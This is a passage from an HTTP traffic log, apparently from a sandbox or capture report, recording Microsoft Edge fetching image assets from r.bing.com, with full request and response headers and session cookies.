cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:49:39 GMT
etag: 0x8DCDC650FC3D927
content-length: 3791
content-type: image/jpeg
content-md5: KZpHmi9/HzDQlUXKjMXRYg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d82f5a4c-d01e-0057-7a67-17031d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=165360
expires: Fri, 06 Dec 2024 08:04:15 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c95a2
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:55:51 GMT
etag: 0x8DCDC65ED9B19A0
content-length: 4409
content-type: image/jpeg
content-md5: qYoIvbmbhCLJ3J1v3ZOHww==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 45485c09-401e-003f-3bb0-155d4c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=80445
expires: Thu, 05 Dec 2024 08:29:00 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c95ac
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ln5TQq6AIWfcBlduDk-5bnaJMpY.jpg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/ln5TQq6AIWfcBlduDk-5bnaJMpY.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:41:55 GMT
etag: 0x8DCDC63FB5BC9CB
content-length: 4547
content-type: image/jpeg
content-md5: eu9Mz25HuboDg2XNPR9Wkw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d61d6f3f-901e-0072-56e0-189bae000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=384985
expires: Sun, 08 Dec 2024 21:04:40 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c95ae
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/dbmNS45xQvD1diApY1T2HExvOo8.jpg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/dbmNS45xQvD1diApY1T2HExvOo8.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:58:31 GMT
etag: 0x8DCDC664D1860E2
content-length: 3814
content-type: image/jpeg
content-md5: KBVwYR+JIZqXDyWJ+YoJ2w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3ec8f7ea-901e-0072-119f-199bae000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=46025
expires: Wed, 04 Dec 2024 22:55:20 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c95b0
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:05:48 GMT
etag: 0x8DCDC5EEFB0049C
content-length: 6817
content-type: image/jpeg
content-md5: DEHuMbBOl4tIgtF2kPA6Og==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 42a58b94-c01e-0048-0d59-17d80d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=295623
expires: Sat, 07 Dec 2024 20:15:18 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c95ab
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:43:17 GMT
etag: 0x8DCDC642C51AEC8
content-length: 4934
content-type: image/jpeg
content-md5: /aLOrgZ5YRk35ucfcBo2qw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: eb80deab-601e-0023-48af-16855b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=150985
expires: Fri, 06 Dec 2024 04:04:40 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c95ad
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:55:56 GMT
etag: 0x8DCDC65F09D13C1
content-length: 5944
content-type: image/jpeg
content-md5: 9ucNopg0mtlCFfC0podQNw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c1644b07-101e-002c-4b21-1868ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=195323
expires: Fri, 06 Dec 2024 16:23:38 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c95af
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/0CgkJZjO41TzOLUmWVOwf2CV3Y8.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/0CgkJZjO41TzOLUmWVOwf2CV3Y8.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:27:44 GMT
etag: 0x8DCEC864714A6D6
content-length: 2352
content-type: image/svg+xml
content-md5: QrO8sPEThHUQpqFL2mecsQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3df33693-501e-0002-2193-21e86a000000
